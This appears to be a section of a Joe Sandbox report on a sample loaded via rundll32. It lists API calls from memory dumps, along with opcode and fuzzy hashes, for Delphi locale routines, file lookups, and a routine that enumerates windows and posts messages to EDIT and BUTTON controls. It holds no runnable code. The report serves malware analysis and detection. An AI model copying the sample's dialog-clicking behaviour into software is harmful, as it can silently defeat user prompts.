                                                                              • Instruction Fuzzy Hash: F8117278A006199FEB00EF96D9D1ABEB3B9EF48308F504475E904A3341DB70BE058A65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,041ED442,?,00000001), ref: 041ED417
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,041ED442,?,00000001), ref: 041ED427
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: adda858c2bd1cf32bea120cb54dd1c0e2bd9ac76a6e7eac89925d00c91f6c3a5
                                                                              • Instruction ID: e80b841489cbe1d340aed8928412f341727710d3606bea3290e1711332020231
                                                                              • Opcode Fuzzy Hash: adda858c2bd1cf32bea120cb54dd1c0e2bd9ac76a6e7eac89925d00c91f6c3a5
                                                                              • Instruction Fuzzy Hash: 61F0E279500A45AFDB50FBB6DCD18AEB3ACEB482187A004B1B400E2650EB34BF00AA50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED22D,?,?), ref: 041ED041
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D,?,?), ref: 041ED08A
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D,?,?), ref: 041ED0AC
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 041ED0CA
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 041ED0E8
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 041ED106
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 041ED124
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D), ref: 041ED164
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001), ref: 041ED18F
                                                                              • RegCloseKey.ADVAPI32(?,041ED217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001,Software\Embarcadero\Locales), ref: 041ED20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                              • API String ID: 2701450724-3496071916
                                                                              • Opcode ID: a387a10092724e5200ff35bfdbe21dbb98206ef30b9ab3f65f7a9423b8d413d8
                                                                              • Instruction ID: 68dd928e08d2bc0321015fd349acc9ceca3a8ac7ded37f2dee33f2a62717c183
                                                                              • Opcode Fuzzy Hash: a387a10092724e5200ff35bfdbe21dbb98206ef30b9ab3f65f7a9423b8d413d8
                                                                              • Instruction Fuzzy Hash: 4751F37DB80A0ABFFB10DA96DDC2FBE73B9DB08704F5044A5B604E6181D770B9409A55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000,00000000), ref: 041ECCF2
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000), ref: 041ECD16
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000), ref: 041ECD25
                                                                              • IsValidLocale.KERNEL32(00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECD37
                                                                              • EnterCriticalSection.KERNEL32(04413C14,00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECD94
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECDBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                              • String ID: en-GB,en,en-US,
                                                                              • API String ID: 975949045-3021119265
                                                                              • Opcode ID: 51c10636423ba33c3f8e6412a7916d70f73aab5c486f46676f99ff268e6935bf
                                                                              • Instruction ID: 2de91425496ba4068905d33fb17c09d3648ccace7ce0903d8db77683f5170319
                                                                              • Opcode Fuzzy Hash: 51c10636423ba33c3f8e6412a7916d70f73aab5c486f46676f99ff268e6935bf
                                                                              • Instruction Fuzzy Hash: E721D53D300F90ABFB11BFBBCCD0639B695AF4464CF504426A501A6250FB66FC90A7E2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 041F08FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 043FD10C: EnumWindows.USER32(043FD074,00000000), ref: 043FD12C
                                                                              • EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD241
                                                                              • SendMessageW.USER32(0001048C,00000102,?,00000000), ref: 043FD29A
                                                                              • Sleep.KERNEL32(0000005A,00000000,043FD315,?,?,?,00000000,00000000,?,043FD372), ref: 043FD2A5
                                                                              • EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD2CD
                                                                              • PostMessageW.USER32(0001048C,000000F5,00000000,00000000), ref: 043FD2EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: EnumWindows$ChildMessage$PostSendSleep
                                                                              • String ID: BUTTON$EDIT
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • [Control-flow graph figure not recovered; graph starts at block 043C7D04]
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 043C7D18
                                                                              • IsWindowUnicode.USER32 ref: 043C7D2C
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 043C7D4F
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 043C7D65
                                                                              • TranslateMessage.USER32 ref: 043C7DEA
                                                                              • DispatchMessageW.USER32 ref: 043C7DF7
                                                                              • DispatchMessageA.USER32 ref: 043C7DFF
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                              • String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • [Control-flow graph figure not recovered; graph starts at block 041E9778 and its nodes reference GetCurrentThreadId, FreeLibrary and ExitProcess]
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E97AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CurrentThread
                                                                              • String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • [Control-flow graph figure not recovered; graph starts at block 043FD10C]
                                                                              APIs
                                                                              • EnumWindows.USER32(043FD074,00000000), ref: 043FD12C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: EnumWindows
                                                                              • String ID: He36SH
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • [Control-flow graph figure not recovered; graph starts at block 043C7F48]
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 043C8029
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043C8040
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,041ED6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,041ED786,00000000,?,00000105), ref: 041ED693
                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,041ED6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,041ED786,00000000,?,00000105), ref: 041ED6BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DefaultLanguage$SystemUser
                                                                              • String ID:
                                                                              • API String ID: 384301227-0
                                                                              • Opcode ID: 92afd7f719e1531bc9b5143813ec110a27e5e483de5ac40e66b89851ea0f585e
                                                                              • Instruction ID: 462a21ea3fe6cad9cfcd998ff5092a1c6f9fbea6ff200c0fa96bdb8865b61b19
                                                                              • Opcode Fuzzy Hash: 92afd7f719e1531bc9b5143813ec110a27e5e483de5ac40e66b89851ea0f585e
                                                                              • Instruction Fuzzy Hash: 66313078A10A1ADFEB10EFAAD8C0ABEB7B5FF48308F504465D414A7650DB74BD84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED748
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED799
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName
                                                                              • String ID:
                                                                              • API String ID: 1159719554-0
                                                                              • Opcode ID: 891680b0f53a57c2f3790dc88de636f07125abf9cac9913cf59007879838e112
                                                                              • Instruction ID: e82175a4745f6afe41e2e2041029aeb679fd9d0472d89eb40a3d061a3450c64a
                                                                              • Opcode Fuzzy Hash: 891680b0f53a57c2f3790dc88de636f07125abf9cac9913cf59007879838e112
                                                                              • Instruction Fuzzy Hash: 17119474A4061DAFEB14EB91DCC5BEEB3B8EF48708F4144B5A508A3250DB706F858E54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 043FD097
                                                                              • SendMessageW.USER32(?,0000000D,00000000,00000000), ref: 043FD0B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 36b44f7de5cc3f9988bd1722dae8f5495bf816cdb5b163250c72d6ced36834a4
                                                                              • Instruction ID: 2429ef4bde73387b370d11b00ba0bf7e4b421c132fed11c38b94500e2155b978
                                                                              • Opcode Fuzzy Hash: 36b44f7de5cc3f9988bd1722dae8f5495bf816cdb5b163250c72d6ced36834a4
                                                                              • Instruction Fuzzy Hash: FD01A734200604BFFB11EB51DD91F6E77ADEF45758F610571FA11AB290DBB4BE028690
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,041E7D6A,?,?,?,00000000), ref: 041E7D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString
                                                                              • String ID:
                                                                              • API String ID: 1825529933-0
                                                                              • Opcode ID: 31dab3e89065ad673f14644f0cdaed8e35e6ea423bb5541f0a80278cfc1d8f2b
                                                                              • Instruction ID: a39d823be11dc521dc2a5da76d47b94de0d775fe3756218a8de3c68f4dbf50d3
                                                                              • Opcode Fuzzy Hash: 31dab3e89065ad673f14644f0cdaed8e35e6ea423bb5541f0a80278cfc1d8f2b
                                                                              • Instruction Fuzzy Hash: 36F0C279344A447FFB11E76ADCD1DBD73ACEF88648B110471F401E3250D7A5AE059A10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 407 41ec498-41ec4a6 408 41ec4a8-41ec4bf GetModuleFileNameW call 41ed70c 407->408 409 41ec4d3-41ec4de 407->409 411 41ec4c4-41ec4cb 408->411 411->409 412 41ec4cd-41ec4d0 411->412 412->409
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(041E0000,?,0000020A), ref: 041EC4B6
                                                                                • Part of subcall function 041ED70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED748
                                                                                • Part of subcall function 041ED70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED799
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 4113206344-0
                                                                              • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction ID: 2479e45ecd0e058bd3906a538de623a8e1527f19010b68bb0c52570cc36cecdc
                                                                              • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction Fuzzy Hash: 8AE0ED79A007109BDB10DF58D8C4A6737E4AB08758F044591ED14CF34AE371E91087E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 31276548-0
                                                                              • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction ID: e7ee4332e3bf1793d33768c22cd59a7f60635682fbe11287ecce45151c97a8a7
                                                                              • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction Fuzzy Hash: 5CA0121C4089015AC404A7996C8240F32801941418FC40710645CA5282E705D56403D7
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,041E5C63), ref: 041E5663
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: ff65e47c46d7f47d85c1269def5c0d950eb09a095f16d21d1e6517253e7271e5
                                                                              • Instruction ID: c0c307c8a8d77189083588b5868e056dc9339d7b624e097071fa3dcd57d2dbb7
                                                                              • Opcode Fuzzy Hash: ff65e47c46d7f47d85c1269def5c0d950eb09a095f16d21d1e6517253e7271e5
                                                                              • Instruction Fuzzy Hash: 99F08CB2B413025BEB149FB89A807567BD6E7083D4F10427EEA09DB798D7B498018780
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 043FD1F8: EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD241
                                                                                • Part of subcall function 043FD1F8: SendMessageW.USER32(0001048C,00000102,?,00000000), ref: 043FD29A
                                                                                • Part of subcall function 043FD1F8: Sleep.KERNEL32(0000005A,00000000,043FD315,?,?,?,00000000,00000000,?,043FD372), ref: 043FD2A5
                                                                                • Part of subcall function 043FD1F8: EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD2CD
                                                                                • Part of subcall function 043FD1F8: PostMessageW.USER32(0001048C,000000F5,00000000,00000000), ref: 043FD2EA
                                                                              • Sleep.KERNEL32(0000012C), ref: 043FD37B
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumMessageSleepWindows$PostSend
                                                                              • String ID:
                                                                              • API String ID: 1775905075-0
                                                                              • Opcode ID: e4a4f7327eb8c72673409f91a7b16c8dbf35ea755d0a6ee179854be872fe2cc0
                                                                              • Instruction ID: c1ce14e3d4dbdd0154e6eae81fa83e1db178956c9183db59955d5e697460802f
                                                                              • Opcode Fuzzy Hash: e4a4f7327eb8c72673409f91a7b16c8dbf35ea755d0a6ee179854be872fe2cc0
                                                                              • Instruction Fuzzy Hash: 7DB0126431070081FF40BF789D4895C23407F05358FC06282D753170D2C61C3C015151
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 041ECE35
                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 041ECE46
                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 041ECF46
                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 041ECF58
                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 041ECF64
                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 041ECFA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                              • API String ID: 1930782624-3908791685
                                                                              • Opcode ID: 2b9734fd79cbe259ada1325da150105158ec8b3ba40e9d5bd9ceeffa892316bd
                                                                              • Instruction ID: 345d74403e63a3caf8023f1af7d7bcd34c2617fbbd382e044f0dda2d80b79726
                                                                              • Opcode Fuzzy Hash: 2b9734fd79cbe259ada1325da150105158ec8b3ba40e9d5bd9ceeffa892316bd
                                                                              • Instruction Fuzzy Hash: FF41BE3AB00A199BDB24DEAACCC4AFEB7B5AF44314F1485A49405A7250FB74BE41DBC4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 043BAD02
                                                                              • IsIconic.USER32(?), ref: 043BAD30
                                                                              • IsWindowVisible.USER32(?), ref: 043BAD40
                                                                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,043C8063,?,044171C0), ref: 043BAD5D
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043BAD70
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043BAD81
                                                                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,043C8063,?,044171C0), ref: 043BADA1
                                                                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,043C8063,?,044171C0), ref: 043BADAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongShow$IconicVisible
                                                                              • String ID:
                                                                              • API String ID: 3484284227-0
                                                                              • Opcode ID: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction ID: 731299e8168c0c75a8278acaca30ff701e37860197cd243040e37b9e35697f22
                                                                              • Opcode Fuzzy Hash: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction Fuzzy Hash: 3211E74264EE9038E72232290C91FEF1DDD4FC3326F1D496DF7D4911C2D768A14692A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA66
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA82
                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA93
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$Info$Valid
                                                                              • String ID:
                                                                              • API String ID: 1826331170-0
                                                                              • Opcode ID: 780d12ff149f7b81132328f87bf36d03f8a6928e414cc4c188f6fbb6d00fd7b2
                                                                              • Instruction ID: f420ee52ad4b0e91ea913bab73ef7bd4b326063d4baa066bed590f2fab4b7a1b
                                                                              • Opcode Fuzzy Hash: 780d12ff149f7b81132328f87bf36d03f8a6928e414cc4c188f6fbb6d00fd7b2
                                                                              • Instruction Fuzzy Hash: 2A319E38A00A18EBEB24DB96DCC1BEEB7B6EB84705F5100E5A50863240E7356E80DE94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: b7087886c27c530dce120c468aba7975aa27e0d696559cc617a25ffa8329e88b
                                                                              • Instruction ID: 29ba0c93793f16c267e38b96d1ee9b5c45e200ae405dbd502ffd8b86af423e9c
                                                                              • Opcode Fuzzy Hash: b7087886c27c530dce120c468aba7975aa27e0d696559cc617a25ffa8329e88b
                                                                              • Instruction Fuzzy Hash: 0CD0A77D960D0B51EB204B11EDC037D21A1E381744FE18071C6114D99AD73DA4C29501
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Iconic
                                                                              • String ID:
                                                                              • API String ID: 110040809-0
                                                                              • Opcode ID: de774d1c27495023c9e14b793e7d3173a7ffa328ea6e595948f5eb0871acfdb4
                                                                              • Instruction ID: 6ec41cb75cd664b921c961dc2dcbf3b4d560ee28dc823db535c3b8fec2619ef2
                                                                              • Opcode Fuzzy Hash: de774d1c27495023c9e14b793e7d3173a7ffa328ea6e595948f5eb0871acfdb4
                                                                              • Instruction Fuzzy Hash: 8BC012709000406BEB01FA68C880A843B92B781306FD04A90E142C615ACB3AA8858BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                              • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                              • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                              • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
